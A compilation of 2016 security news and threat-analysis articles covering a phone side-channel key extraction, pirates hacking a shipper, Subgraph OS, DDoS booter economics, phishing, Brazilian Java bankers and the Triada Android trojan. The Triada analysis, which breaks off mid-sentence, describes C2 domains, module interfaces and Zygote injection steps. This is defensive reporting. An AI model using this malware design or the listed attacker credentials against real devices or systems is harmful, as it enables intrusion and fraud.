Side-Channel Attacks
According to the researchers, the recent exploit is a non-invasive Side-Channel Attack: Attack that extracts the secret crypto key from a system by analyzing the pattern of memory utilization or the electromagnetic outputs of the device that are emitted during the decryption process.
The exploit works against the Elliptic Curve Digital Signature Algorithm (ECDSA), a standard digital signature algorithm that is most widely used in many applications like Bitcoin wallets and Apple Pay and is faster than several other cryptosystems.
How to Steal Secret Encryption Keys?
how-to-hack-android-story
During the experimental hack, the researchers placed a $2 magnetic probe near an iPhone 4 when the phone was performing cryptographic operations.
While performing cryptographic operations, the security researchers measured enough electromagnetic emanations and were able to fully extract the secret key used to authenticate the end user's sensitive data and financial transactions.
The same hack can be performed using an improvised USB adapter connected to the phone's USB cable, and a USB sound card to capture the signal.
"Using such measurements, we were able to fully extract secret signing keys from OpenSSL and CoreBitcoin running on iOS devices," the researchers wrote in a blog post published Wednesday. "We also showed partial key leakage from OpenSSL running on Android and from iOS's CommonCrypto."
The researchers also experimented their exploit on a Sony-Ericsson Xperia X10 Phone running Android and said they believe such an attack is feasible.
The security researchers also cited a recent independent research by a separate team of security researchers that discovered a similar Side-Channel flaw in Android's version of the BouncyCastle crypto library, making the device vulnerable to intrusive electromagnetic key extraction attacks.
Currently, the hack requires an attacker to have physical control of, or, at least, a probe or cable in proximity to, a vulnerable mobile device as long as it performed enough tasks to measure a few thousand of ECDSA signatures.
Affected Devices
Older iOS versions 7.1.2 through 8.3 are vulnerable to the side-channel attack. The current iOS 9.x version includes defenses against side-channel attacks, so are unaffected.
However, nothing can save iPhone and iPad users even running current iOS versions if they are using vulnerable apps. One such vulnerable iOS app is CoreBitcoin that is used to protect Bitcoin wallets on iPhones and iPads.
Developers of CoreBitcoin told the security researchers that they are planning to replace their current crypto library with one that is not susceptible to the key extraction attack. Meanwhile, the recent version of Bitcoin Core is not vulnerable.
Both OpenSSL versions 1.0.x and 1.1.x are vulnerable except when compiled for x86-64 processors with the non-default option enabled or when running a special option available for ARM CPUs.
The team has already reported the vulnerability to the maintainers of OpenSSL, who said that hardware side-channel attacks are not a part of their threat model.
For in-depth technical details, you can read the full research paper [PDF].


Real pirates used hacking techniques to raid a shipping company
4.3.2016 Hacking

Real pirates have hacked into a shipping company to locate valuable cargo before hijacking vessels in targeted attacks. Technology meets Piracy.
The technology is enlarging our surface of attack in a dramatic way, every company in every industry is potentially a target. Let’s discuss today of a singular case that demonstrates it, pirates have hacked into a shipping company to locate valuable cargo before hijacking vessels in targeted attacks.

The criminal organisation breached the content management system (CMS) of the unnamed shipping company to determinate the exact position of containers having the most valuable cargo.

This is a considerable advantage for the traditional piracy, in the past criminals had patrol boats using scanners to locate the precious commodities. By obtaining the location of the valuable cargo, it makes easier and faster hijacking the vessels.

The case was also reported in the Verizon’s Data Breach Digest addendum report.

“However, in recent months, the pirates had changed their tactics somewhat, and in a manner that the victim found extremely disconcerting. Rather than spending days holding boats and their crew hostage while they rummaged through the cargo, these pirates began to attack shipping vessels in an extremely targeted and timely fashion. Specifically, they would board a shipping vessel, force the crew into one area and within a short amount of time they would depart. When crews eventually left their safe rooms hours later, it was to find that the pirates had headed straight for certain cargo containers. It became apparent to the shipping company that the pirates had specific knowledge of the contents of each of the shipping crates being moved. They’d board a vessel, locate by bar code specific sought-after crates containing valuables, steal the contents of that crate—and that crate only—and then depart the vessel without further incident. Fast, clean and easy.” states the report.

In the specific case, the hackers made a number of OPSEC mistakes that exposed their identity to the investigators, for example, they failed to protect the traffic to the compromised server.

HMAS Melbourne's boarding party intercepts a suspected pirate boat. *** Local Caption *** Royal Australian Navy ship, HMAS Melbourne operating off the coast of Somalia, intercepted suspected pirates as part of a Combined Task Force 151 tasking for Combined Maritime Forces on 15 October 2013.

“One of the first mistakes made by the threat actors was failing to enable SSL on the web shell. As such, all the commands were sent over the internet in plain text. This allowed us to write code to extract these commands from the full packet capture (FPC) data. We were ultimately able to recover every command the threat actors issued, which painted a very clear picture. These threat actors, while given points for creativity, were clearly not highly skilled. For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers.” continues the report.

The shipping company, once discovered the cyber attacks, secured its servers and improved the operational security of its systems.

Piracy is a very widespread phenomenon in some areas of the world, the use of technology can definitely make the most complex activities of prevention and contrast.

There are numerous cases related to the collaboration between ordinary crime and hacking crews, I remember an episode occurred in 2013 when an investigation of a cyber-attack on the Belgian port of Antwerp allowed law enforcement to discover that drug traffickers recruited hackers to hack IT systems that controlled the movement and location of the containers.

“Police carried out a series of raids in Belgium and Holland earlier this year, seizing computer-hacking equipment as well as large quantities of cocaine and heroin, guns and a suitcase full of cash. Fifteen people are currently awaiting trial in the two countries. Mr Wainwright says the alleged plot demonstrates how the internet is being used as a “freelance marketplace” in which drug trafficking groups recruit hackers to help them carry out cyber-attacks “to order”. “[The case] is an example of how organized crime is becoming more enterprising, especially online,” he says.

cybercrime hackers equipment used at ports piracy
The Europol official confirmed that organized crime groups were paying for hackers involved in criminal activities. The profitable collaboration started at least in 2011, Dutch-based trafficking group hid cocaine and heroin among legitimate cargoes, including timber and bananas shipped in containers from South America. The role of hackers based in Belgium was to infiltrate computer networks in at least two companies operating in the port of Antwerp to access secure data giving them the location and security details of containers.


Subgraph OS — Secure Linux Operating System for Non-Technical Users
4.3.2016 Security
Information security and privacy are consistently hot topics after Edward Snowden revelations of NSA's global surveillance that brought the world's attention towards data protection and encryption as never before.
Moreover, just days after Windows 10's successful launch last summer, we saw various default settings in the Microsoft's newest OS that compromise users' privacy, making a large number of geeks, as well as regular users, migrate to Linux.
However, the problem is that majority of users are not friendly to the Linux environment. They don't know how to configure their machine with right privacy and security settings, which makes them still open to hacking and surveillance.
However, this gaping hole can be filled with a Debian-based Security-focused Linux operating system called Subgraph OS: A key solution to your Privacy Fear.
Subgraph OS is a feather weighted Linux flavor that aims to combat hacking attacks easier, even on fairly low-powered computers and laptops.
Subgraph OS comes with all the privacy and security options auto-configured, eliminating the user's manual configuration.
Security-focused operating systems do exist, but they are often very resource intensive and can be run only on specific hardware. They are also a real technical challenge for users who don't know the advanced techniques required to get a secure operating system running.
Why Should You Install Subgraph Linux OS?
Subgraph OS — Secure Linux Operating System for Non-Technical Users
Subgraph OS offers more than just kernel security. The Linux-based operating system comes with a slew of security and privacy features that its developers believe will be more accessible to non-technical users.
The OS also includes several applications and components that reduce the user's attack surface. Let's have a close look on important features Subgraph OS provides.
1. Automated Enhanced Protection with Application Sandboxing using Containers
A security feature called Oz is possibly the most interesting feature of Subgraph OS. Oz is a system for isolating programs so that if an attacker exploits an application security vulnerability, the rest of your machine and your network will remain largely unaffected.
'Oz' makes this possible by delimiting the permission applications have to other parts of the computer, so that when an attacker compromises the security hole in any application it does not allow any malicious activities to take place.
2. Mandatory Full Disk Encryption (FDE)
Subgraph OS offers Full Disk Encryption by default; thus making it a mandatory step for its users to cling on to the security.
Full disk encryption enables a shadow of encryption to protect your hard disks, preventing your data even if your hard drive got misplaced or fell into the wrong hands.
Additionally, Subgraph OS also wipe off the memory when the system is shutdown in an effort to defend the Cold Boot Attacks.
Cold Boot Attacks are a type of side channel attacks that take the advantage of data that resides in the DRAM and SRAM cells for few seconds soon after Power OFF.
3. Online Anonymity — Everything through Tor
secure-operating-system
Subgraph OS routes all your traffic through the TOR anonymity network by default, making it difficult for attackers to figure out the actual physical location of their targets. This would ensure the endpoint security.
Also More: Is This Security-Focused Linux Kernel Really UnHackable?
4. Advanced Proxy Setting
Secure Linux Operating System
Application's transmission to the outside world is carried out via Metaproxy application, which would facilitate to identify the legitimate connections.
Since every application does not come preconfigured to communicate through TOR, Metaproxy relays outgoing connections via TOR without having to configure proxy settings for each application.
5. System and Kernel Security
Subgraph OS is also hardened by Grsecurity – a set of patches that are designed to make Linux kernel's security vulnerabilities like memory corruption flaws far more difficult to exploit.
Support of 'PaX' would be an extra topping of security that aid with least privilege protection for memory pages. This would make security vulnerabilities such as buffer overflow and memory corruption flaws in applications and the operating system kernel difficult to exploit.
6. Secure Mail Services
Secure Mail Services
As everything is concerned, Subgraph OS includes Subgraph Mail that integrates OpenPGP to let users send and receive encrypted/signed messages using PGP/MIME.
Subgraph Mail service is designed in such a way that makes PGP key management and sending/receiving of encrypted email easy for everybody.
Subgraph Mail is also secure – Unlike Data security, authentication and integrity verification are implemented in such a way that even if some parts of the application are compromised, a hacker still would not have access to the rest of your emails or encryption keys.
Additionally, there is no need to execute commands in a terminal window or install plug-ins. Web browser support is deliberately left out of the mail client to eliminate Web exploits from within mail.
7. Package Integrity

Subgraph OS also provides an alternative way to trust the downloaded packages. The packages are to be matched against the binaries present in the operating system's distributed package list, thus becoming a finalizer.
Recently Backdoored Linux Mint hacking incident is an example to this.
Thus, Subgraph OS eliminates the usage of any tampered or malicious downloaded packages.
Comparison Between Subgraph OS and Qubes OS
most-secure-operating-system
Subgraph OS has some similarities to Qubes OS – Another Linux-based security-oriented operating system for PCs.
Unlike Subgraph OS that isolates individual applications on a more granular level, Qubes OS typically runs different isolated domains inside different virtual machines – one for your work, one for your personal use and more.
Subgraph OS doesn't isolate networking and USB stacks or other devices and drivers, but Qubes OS does.
Also, Subgraph OS uses Xpra for GUI virtualization, which is less secure than Qubes GUI protocol, but has some usability advantages like seamless working clipboard.
Subgraph makes use of Netfilter hooks to redirect app-generated traffic into TOR network and to allow the user to see and control app-generated traffic, but Qubes OS uses separate service Virtual Machines (Proxy VMs like TorVM) to intercept traffic.
As the list goes on... Subgraph would be a treasure for the privacy lovers.
How to Download Subgraph Os?
Subgraph Os will be available for download via its offical website. Let's wait for the operating system to get unveiled in Logan CIJ Symposium conference in Berlin on March 11-12 to experience the Cyber Isolation!!!


Take note, next week update Adobe Reader and Acrobat to fix critical flaws
4.3.2016 Vulnerebility

Adobe announced that it will release security updates next week to patch vulnerabilities in Acrobat and Reader products for Windows and Mac.
Adobe has announced yesterday, March 8, that it will release security updates next week to patch vulnerabilities in Acrobat and Reader products for Windows and Mac.

We are speaking about critical vulnerabilities that fortunately are currently not exploited in the wild, for this reason, the security team at Adobe has assigned a priority rating “2” to the vulnerabilities explaining that it’s unlikely that they will be abused by malicious actors in the near future.

Adobe has issued a prenotification advisory to explain which product versions are affected by the security vulnerabilities and anticipating the imminent release of security patches.

“Adobe is planning to release security updates on Tuesday, March 8, 2016 for Adobe Acrobat and Reader for Windows and Macintosh.” states the advisory “Users may monitor the latest information on the Adobe Product Security Incident Response Team (PSIRT) blog at https://blogs.adobe.com/psirt.”
In the following table are reported the affected versions and the priority rate assigned by Adobe:

Adobe Acrobat and Reader vulnerabilities

Adobe Acrobat and Reader are among the software most targeted by hackers in numerous attacks in the wild, the company is spending a significant effort in promptly fixing any reported security hole.

In January, Adobe released Acrobat and Reader updates to fix a total of 17 flaws, including use-after-free vulnerabilities (CVE-2016-0932, CVE-2016-0934, CVE-2016-0937, CVE-2016-0940, CVE-2016-0941), a double-free flaw (CVE-2016-0935) that could lead to code execution, and several memory corruption vulnerabilities that can be exploited for arbitrary code execution (CVE-2016-0931, CVE-2016-0933, CVE-2016-0936, CVE-2016-0938, CVE-2016-0939, CVE-2016-0942, CVE-2016-0944, CVE-2016-0945, CVE-2016-0946).

Users are invited to update their software as soon as the security patches become available.

According to data provided by the CVE Details Adobe software are among the software with the highest number of vulnerabilities in 2015.

The data were provided by CVE Details, which manages data coming from the National Vulnerability Database (NVD). Common Vulnerabilities and Exposures (CVE) system tracks publicly disclosed security vulnerabilities.

The software with the major number of vulnerabilities is the Apple Mac OS X, that accounted for 384 vulnerabilities, followed by Apple iOS with 375 vulnerabilities. The Adobe Flash Player is just at third place with 314 vulnerabilities, followed by Adobe AIR SDK, with 246 vulnerabilities and Adobe AIR itself, also with 246 vulnerabilities.

Last year, Adobe patched a total of 460 vulnerabilities, including more than 100 in Acrobat and Reader.


A day attack with DDoS booter cost $60 and can cause $720k in damage
4.3.2016 Computer Attack

According to a study conducted by the experts at Arbor’s ASERT Team a day attack with a DDoS booter cost $60 and can cause $720k in damage.
We have discussed several times about the concept of cybercrime-as-a-service, today I’ll show you a case related the offer for rent of distributed-denial-of-service (DDoS) attacks for less than US$60 per day.

According to Dennis Schwarz, Research Analyst on Arbor’s ASERT Team, a DDoS attack that costs US$60 per day could inflict as much as US$720,000 in damage to the victim organisation. Technically, these services are called booter or stresser services and could be sold as would-be legitimate tools for security professionals that need to test the resilience of their infrastructure to cyber attacks or their capacity to support a high-volume of traffic.

The problem is that criminal organisations are abusing booters for illegal DDoS attacks, one of the most popular examples is the one used by the LizardSquad hacking crew, the LizardStresser.

The popular security expert Brian Krebs and a research team discovered that the Lizard Stresser DDoS tool relies on compromised Home Routers, this is very common for such kind of illegal services.Schwarz examined one

Schwarz examined one booter service sold in the Russian underground a user with the pseudonym of Forceful. The researcher has compared the cost to rent per day with the average damage suffered by the victims.

Schwarz noticed numerous advertisements for a DDoS booter service on one of the many public Russian language forums, one of them was published by a bad actor known as “Forceful” who operated one of these services. Searching for ICQ number and/or Jabber address the experts discovered a number of advertisements starting from November 2014.

The ads typically contain:

A fancy logo, banner, or motto
Short explanation of what DDoS is
Type of DDoS attacks they support
Pricing
Reputation information
Contact details
Forceful charges $60 a day to rent the booter, meanwhile the cost on an entire week is $400, and anyway it offers a 10-minute test sessions to its clients.

ddos booter advertising

“In this marketplace, it almost always starts with an advertisement for a DDoS booter service on one of the many public Russian language forums,” Schwarz says.

ddos booter cost cybercrime

Thanks to a series of OPSEC mistakes made by Forceful, Schwarz and his team were able to identify the malware used by the threat actor and the structure of botnet he uses.
According to the Arbor Worldwide Infrastructure Security Report the average suffered by victims of the attack is US$500 per minute. The cost is attributable to downtime of the targeted infrastructure, reputational damage, and the price of remediation.

According to the data elaborated by the experts, a booter attack could cause US$7.2 million in damages a day, costs that could be drastically reduced by the adoption of DDoS defense solutions.

Schwarz highlighted the extreme asymmetry of the economics of DDoS attackers and urged organizations in adopting defensive solutions.

“As we see in Arbor’s most recent Worldwide Infrastructure Security Report (WISR), the average cost to the victim of a DDoS attack is around $500 per minute. And as we’ve seen above, the mean cost to the attacker is only $66 per attack. This finding highlights both the extreme asymmetry of the economics of DDoS attackers vs. those of the victims of DDoS attacks, as well as the importance of robust DDoS defenses to all organizations which depend upon their online presence for revenue, customer support, and other important business functions. The cost to launch a DDoS attack is so low that the barrier to entry for attackers is practically nil – and that means that *any* organization can potentially be the target of a DDoS attack, since the investment required to launch an attack is so low.”

According to Arbor Network’s BladeRunner, from July to October the Forceful’s booter bot was rented for 82 attacks equaling $5,408.


Amazon used as bait
4.3.2016 Zdroj: Kaspersky Safety
In recent weeks, we have seen several mass-mailings in French, Italian and English, imitating messages from Amazon’s online shops. In all the mailings, the recipients were offered a voucher, a gift certificate or some other prize.

The enticing offers were mostly sent from Italy or France. However, the email addresses from which they were sent immediately raised suspicions: the culprits didn’t even try to imitate Amazon’s official email addresses, and merely used Amazon in the sender’s name.

Amazon used as baitEach message contains links that supposedly lead to the Amazon website. The recipients have to click the links to claim their “prize”. Analysis of the links shows that users from different countries are redirected to different web pages. For instance, users with a European IP address are asked to fill in a form in English, and are offered the chance to enter a draw for an iPhone 6S as a reward.

 

The winner is promised a new smartphone for just 1 euro, but first has to enter their bank card details on the video streaming site myflixhd[.]com.

 

The website offers a 5-day trial period, but requires the user’s bank card details, and then deducts a subscription fee of 50 euros per month if the user fails to cancel the subscription on time.

Naturally, Amazon has nothing to do with this “draw” or any other similar scams, and the chances of winning an iPhone 6S are very slim, to say the least. There is a good chance, however, that the bank card details entered on this advertising web page will be used by third parties for their own ends.


Komplexní bezpečnostní služby včetně školení v češtině nabízí Kaspersky

4.3.2016 Zabezpečení
Služby Security Intelligence Services, které slouží především pro bezpečnostní operační střediska, korporace a poskytovatele služeb, spustil Kaspersky Lab. V jeho rámci Security Intelligence Services mají uživatelé k dispozici data o hrozbách, reporting zpravodajských informací, online a onsite školení a program zvýšení povědomí o bezpečnosti nebo specializované služby jako penetrační testování a posouzení zabezpečení aplikací.

Služby se skládají ze tří hlavních součástí – analýzy bezpečnosti, školení a zpravodajství o hrozbách. Ty jsou navrženy tak, aby splňovaly požadavky korporací, vládních agentur, poskytovatelů internetového připojení, telekomunikačních společností a poskytovatelů bezpečnostních služeb.

Novinka v podobě analýzy bezpečnosti zahrnuje penetrační testování a posouzení zabezpečení aplikací. Tyto služby umožní klientům předvídat specifika kybernetického útoku ještě před tím, než se odehraje. Podporou těchto služeb se zabývá specializovaný tým analytiků Kaspersky Lab, který může otestovat zabezpečení podniku proti široké škále napadení.

Školení kybernetické bezpečnosti uplatňuje techniky herních designů (gamifikace) a je založené na nejnovějších zpravodajských informačních službách v oblasti sociálního inženýrství a cílených útoků, čímž prý ztělesňuje princip prožitkového učení. Tento program určený zaměstnancům je možné vést i v češtině. A konečně zpravodajství nabízí přístup k datům Kaspersky Lab skrze datové kanály pro informace o hrozbách a sledování botnetů. Datové kanály pro informace o hrozbách obsahují nejaktuálnější data o škodlivých programech a URL adresách, phishingových útocích a mobilních hrozbách.

Navíc jsou kompatibilní s oblíbenými SIEM (Security Information and Event Management) řešeními třetích stran. Informace jsou dostupné také ve formě reportingu o hrozbách, který je připravován na míru na základě specifických aspektů prostředí hrozeb a zpráv o nejnovějších a nejsofistikovanějších hrozbách.


US starts cyber operations against the ISIL in Mosul

4.3.2016 Hacking

Senior Pentagon officials on Monday revealed the military’s first use of cyber warfare operations against the ISIL terrorist group.
The US military has started launching cyber attacks against members of the terrorist organization ISIS as part of the operation conducted to take back the Iraqi city of Mosul.

The US military is using cyber tools to contrast the ISIS troops in the area, interfering members’ operation and communication.

“By encircling and taking this town, we are also working to sever the last major artery between Raqqa and Mosul, an operation critical to dissecting ISIL’s parent tumor into two parts in Iraq and Syria. At the same time, we’re bombing ISIL’s banks as well as oil wells they’ve taken over or coerced others into operating on their behalf. We’re also using cyber tools to disrupt ISIL’s ability to operate and communicate over the virtual battlefield.” announced the Defense Secretary Ash Carter at a Monday Pentagon press briefing. that U.S. forces are using cyber tools to disrupt ISIS’s ability to operate and communicate over the virtual battlefield.

According to Carter, the goal of the cyber operations is the disruption of the ISIL‘s command and control, particularly in Syria.

” I think you’re referring to our use of cyber which we have talked about generally. In the counter-ISIL campaign in — particularly in Syria to interrupt, disrupt ISIL’s command and control, to cause them to lose confidence in their networks, to overload their network so that they can’t function, and do all of these things that will interrupt their ability to command and control forces there, control the population and the economy.” added Carter.

“So this is something that’s new in this war, not something you would’ve seen back in the Gulf War, but it’s an important new capability and it is an important use of our Cyber Command and the reason that Cyber Command was established in the first place.”

The US Government has already started the cyber operations that the US Cyber Command is carrying out.

“we’re trying to both physically and virtually isolate ISIL, limit their ability to conduct command and control, limit their ability to communicate with each other, limit their ability to conduct operations locally and tactically.” said Joint Chiefs Chairman General Joseph Dunford.

“And frankly, they’re going to experience some friction that’s associated with us and some friction that’s just associated with the normal course of events in dealing in the information age.”


Which are most used passwords in opportunistic criminal attacks?

4.3.2016 Computer Attack

Which are the usernames and passwords used by hackers when they scan the internet indiscriminately? Give a look to the Rapid7′ report
Recently the firm Splashdata revealed in its annual report on the worst 2015 passwords (“123456” and “password”), today I desire to present you a new interesting study on passwords conducted by Rapid7.

The experts used Heisenberg, a network of low-interaction honeypots that took note of the most common passwords used the hackers in targeting Internet-exposed systems.

The research conducted by Rapid7 has focused on the brute force attacks that tried to guess Remote Desktop Protocol (RDP) credentials for control home, point-of-sale (PoS), and kiosk systems.

“Attackers do not merely pick random strings as passwords (or usernames). Such brute force attacks are process intensive, time consuming, and tend to have very poor performance from the attacker’s point of view. Instead, attackers in our data set were clearly conducting dictionary attacks; i.e. they were using chosen usernames and passwords that have an assumed high likelihood of success when applied to a target system. ” states the report published by Rapid7.

The experts analyzed more than 221,000 attacks from 119 different countries observed between March 2015 and February 2016. 40 percent of the attacks came from China, followed by the United States with 25 percent of attempts, South Korea with 6 percent, the Netherlands with 5 percent and Vietnam with 3 percent.

passwords honeypot attacks 2

The most common usernames attempted by hackerd were “administrator” and “Administrator,” (60%), other usernames are “user1,” “admin,” “alex,” “pos,” “demo,” “db2admin,” “Admin” and “sql.”

The most common passwords “x” (5,36 %), “Zz” (4,79%) and “St@rt123” (3,62%).

“Truly, the surprising detail to be uncovered here is just how weak these passwords are. One or two characters, easily guessed strings, and a strange appearance of a series of dots. Since these passwords were deliberately chosen by the various scanners which ran up against Heisenberg, it implies that the default and common passwords to several POS and kiosk systems are chosen out of convenience, rather than security.” continues the report.

passwords honeypot attacks

The experts used Dropbox’s Zxcvbn application for measuring password complexity, determining that less than 9 percent of the passwords used by hackers got the highest score, meanwhile 14.3 percent scored “3.”

“Zxcvbn is hosted on a GitHub repository and was released by Dropbox with a permissive open source license. Rapid7 data scientists and software engineers absolutely love well-cared-for open source projects, so we have adopted zxcvbn as a means to measure the complexity of Heisenberg-collected passwords. By running our collected passwords through zxcvbn, we can approximate “complexity” with zxcvbn’s crackability score.”


First step in cross-platform Trojan bankers from Brazil done
3.3.2016 Zdroj: Kaspersky Virus
Brazilian cybercriminals have been “competing” with their Russian-speaking “colleagues” for a while in who makes more Trojan bankers and whose are most effective. A few days ago we found a new wave of different campaigns spreading the initial “Banloader” components in Jar (Java archive), which is very particular by its nature – it’s able to run on Linux, OS X, and of course Windows. Actually, it’s also able to run under certain circumstances even on mobile devices.

Social engineering

Social engineering actually varies from vehicle taxes or fines to boleto’s payment system and even a kind of electronic debt call center.

 

Some emails come with download links to Jar files, while others directly spread Jar inside archives, so the end user does not need to download anything from the Internet.

Infection

Everything happens when the victims make a click – and we should remember Brazilian cybercriminals are experts in social engineering. So, right, the victim makes a click. What happens next? That also varies. It depends on which group is behind that particular attack. We say this because we have seen different cyber-criminal gangs from Brazil that are clearly not related actively using Jar files to seed bankers.

The fact is, as long as the victim has Java locally installed, the “Banloader” will run and it doesn’t matter if it’s OS X, Linux or Windows.

Some groups just go for traditional PAC modifications, redirecting victims to fake bank websites:

 

While others work with slightly more complex obfuscating Jar routines using DES or RSA algos.

 

Once deobfuscated it’s clear it drops a file to the system, which is actually the Banker in charge of stealing the victim’s money:

 

Interesting strings

Whether it’s intentional or not, the cybercriminals left strings. Here are the strings found in different Jar-based Trojan Banker samples:

“liberdade” – freedom, liberty
“maravilha” – miracle, thing of beauty

Why is it important?

Because Jar files run on Windows, OS X and Linux, wherever Java is installed. This is the very first step cybercriminals from Brazil have made towards “cross-platforming“.

What does it mean?

Brazilian Trojan Banker coders are now making Trojans running on all platforms and not only Windows.

Does it mean that OS X and Linux users are now also a target of Brazilian bankers?

Not yet. We say this because the banloaders (initial components) come in Jar but the final components (dropped malware) are still designed to run in Windows or they use a Windows system in the case of PAC abusing. However, it’s clear the first step to cross-platforming has just been made. So, it’s a matter of time till we will find Brazilian bankers running on all platforms.

Are Brazilian coders going to release full bankers – bandleaders and bankers running exclusively on Jar?

There is no reason to believe they won’t. They have just started and they won’t stop.

How stealthy is their Jar malware?

Actually, the general detection rate for ALL AV vendors is extremely low.

What is the detection name Kaspersky Lab products use to detect this threat?

Depending on the characteristics of each sample it may fall into one of the following families:

Trojan-Banker.Java.Agent
Trojan-Downloader.Java.Banload
Trojan-Downloader.Java.Agent

Where are most of the victims located?

Naturally Brazil, Spain and then Portugal, the United States, Argentina and Mexico.

 

Why are there victims in Germany and China?

The same malware techniques have been used by other threat actors and detected under the same malware family.


Attack on Zygote: a new twist in the evolution of mobile threats
3.3.2016 Zdroj: Kaspersky Mobil

The main danger posed by apps that gain root access to a mobile device without the user’s knowledge is that they can provide access to far more advanced and dangerous malware with highly innovative architecture. We feared that Trojans obtaining unauthorized superuser privileges to install legitimate apps and display advertising would eventually start installing malware. And our worst fears have been realized: rooting malware has begun spreading the most sophisticated mobile Trojans we have ever seen.

Rooting malware

In our previous article we wrote about the increasing popularity of malware for Android that gains root access to a device and uses it to install apps and display aggressive advertising. Once this type of malicious program penetrates a device, it often becomes virtually impossible to use it due to the sheer number of annoying ads and installed apps.

Since the first article (August 2015), things have changed for the worse – the number of malware families of this type has increased from four to 11 and they are spreading more actively and becoming much better at “rooting”. According to our estimates, Trojans with superuser privileges attacked about 10% of Android-based mobile devices in the second half of 2015. There were also cases of these programs being pre-installed on new mobile devices coming from China.

However, it’s worth noting that Android-based devices running versions higher than 4.4.4 have much fewer vulnerabilities that can be exploited to gain root access. So basically, the malware targets earlier versions of the OS that are still installed on the majority of devices. The chart below shows the distribution of our product users by Android version. As can be seen from the chart, about 60% use a device on which these Trojans can gain root access.

 

Versions of Android OS used by users of our products

The owners of the Trojans described above, such as Leech, Ztorg, Gorpo (as well as the new malware family Trojan.AndroidOS.Iop) are working together. Devices infected by these malicious programs usually form a kind of “advertising botnet” via which advertising Trojans distribute each other as well as the advertised apps. Within a few minutes of installing one of these Trojans, all other active malware on the “network” is enabled on the victim’s device. Cybercriminals are cashing in on advertising and installing legitimate applications.

In 2015, this “advertising botnet” was used to distribute malware posing a direct threat to the user. This is how one of the most sophisticated mobile Trojans we have ever analyzed was spread.

Unique Trojan

The “advertising botnet” mentioned above was used to distribute a unique Trojan with the following features:

Modular functionality with active use of superuser privileges
Main part of malicious functionality exists in device RAM only.
Trojan modifies Zygote system process in the memory to achieve persistence.
Industrial approaches used in its development, suggesting its authors are highly qualified.
The Trojan is installed in the folder containing the system applications, under names that system applications are likely to have (e.g. AndroidGuardianship.apk, GoogleServerInfo.apk, USBUsageInfo.apk etc.).

Before starting work, the malicious program collects the following information:

Name of the device
Version of the operating system
Size of the SD card
Information about device memory (from the file /proc/mem)
IMEI
IMSI
List of applications installed
The collected information is sent to the cybercriminals’ server whose address the Trojan receives from a list written in the code:

bridgeph2.zgxuanhao.com:8088
bridgeph2.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph3.zgxuanhao.com:8088
bridgeph4.zgxuanhao.com:8088
bridgeph2.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph3.viewvogue.com:8088
bridgeph4.viewvogue.com:8088
Or, if the above servers are unavailable, from a list of reserve command servers also written in the code:

bridgecr1.tailebaby.com:8088
bridgecr2.tailebaby.com:8088
bridgecr3.tailebaby.com:8088
bridgecr4.tailebaby.com:8088
bridgecr1.hanltlaw.com:8088
bridgecr2.hanltlaw.com:8088
bridgecr3.hanltlaw.com:8088
bridgecr4.hanltlaw.com:8088
In reply, an encrypted configuration file arrives and is stored as /system/app/com.sms.server.socialgraphop.db. The configuration is regularly updated and contains the following fields:

mSericode – malware identifier
mDevicekey – the device identifier generated on the server (stored in /system/app/OPBKEY_< mDevicekey >);
mServerdevicekey – the current server identifier
mCD – information used by cybercriminals to adjust the behavior of the modules;
mHeartbeat – execution interval for the “heartbeatRequest” interface
mInterval – interval at which requests are sent to the command server
mStartInterval – time after which the uploaded DEX files (modules) are run
mServerDomains – list of main domains
mCrashDomains – list of reserve domains
mModuleUpdate – links required to download the DEX files (modules).
If the mModuleUpdate field is not filled, the DEX files are downloaded and saved. Then these files are downloaded in the context of the malicious program using DexClassLoader.loadClass(). After that, the modules are removed from the disk, i.e. they only remain in device memory, which seriously hampers their detection and removal by antivirus programs.

The downloaded modules should have the following interface methods for proper execution:

init(Context context) – used to initialize the modules
exit(Context context) – used to complete the work of the modules
boardcastOnReceive(Context context, Intent intent) – used to redirect broadcast messages to the module;
heartbeatRequest(Context context) – used to initiate the module request to the command server. It is needed in order to obtain the data module required by the server;
heartbeatResponce(Context context, HashMap serverResponse) – used to deliver the command server response to the module.
Depending on the version, the following set of interfaces may be used:

init(Context context) – used to initialize the modules
exec() – used to execute the payload
exit(Context context) – used to complete the work of the modules
This sort of mechanism allows the app downloader to execute modules implementing different functionality, as well as coordinating and synchronizing them.

The apps and the loaded modules use the “android bin”, “conbb”, “configopb”, “feedback” and “systemcore” files stored in the folder /system/bin to perform various actions on the system using superuser privileges. It goes without saying that a clean system does contain these files.

Considering the aforementioned modular architecture and privileged access to the device, the malware can create literally anything. The capabilities of the uploaded modules are limited only by the imagination and skills of the virus writers. These malicious programs (the app loader and the modules that it downloads) belong to different types of Trojans, but all of them were all included in our antivirus databases under the name Triada.

At the time of analysis the app downloader (detected by us as Backdoor.AndroidOS.Triada) downloaded and activated the following modules:

OPBUpdate_3000/Calendar_1000 – two modules with duplicate functionality capable of downloading, installing and running an application (detected as Trojan-Downloader.AndroidOS.Triada.a).
Registered_1000 – module capable of sending an SMS upon the request of the command server. Detected as Trojan-SMS.AndroidOS.Triada.a.
Idleinfo_1000 – module that targets applications that use SMS to make in-app purchases (intercepts outgoing text messages). Detected as Trojan-Banker.AndroidOS.Triada.a.
Use of the Zygote process

A distinctive feature of the malicious application is the use of the Zygote process to implement its code in the context of all the applications on the device. The Zygote process is the parent process for all Android applications. It contains system libraries and frameworks used by almost all applications. This process is a template for each new application, which means that once the Trojan enters the process, it becomes part of the template and will end up in each application run on the device. This is the first time we have come across this technique in the wild; Zygote was only previously used in proof-of-concepts.

The chart below shows the architecture of the malicious program.

 

Let us take a closer look at how the Zygote process is infected.

Preparatory stage and testing

All the magic starts in the crackZygoteProcess() function from the Trojan-Banker module. Its code is displayed in the screenshot below.

 

First, the Trojan loads the shared library libconfigpppm.so and invokes the configPPP() function exported by this library (the first highlighted string on the screenshot). Second, if configPPP() succeeds in calling System.getProperty() from Android API with the unusual argument ‘pp.pp.pp’ (it will be explained later why this action is performed) and the returned value is not null, the Trojan runs the ELF-executable configpppi with the PID of the zygote process as an argument.

Let’s go through the process in order. The first thing the Trojan does inside the configPPP() function from libconfigpppm.so is to obtain the load address (in the address space of its process) of the file that implements the ActivityThread.main() function from Android API. Next, using the load address and /proc/self/maps, the Trojan discovers the name and path to the file on the disk. In most cases, it will be /system/framework/framework.odex.

The Trojan reads this file from disk and compares it with the file that is already loaded in the address space. The comparison is performed as follows:

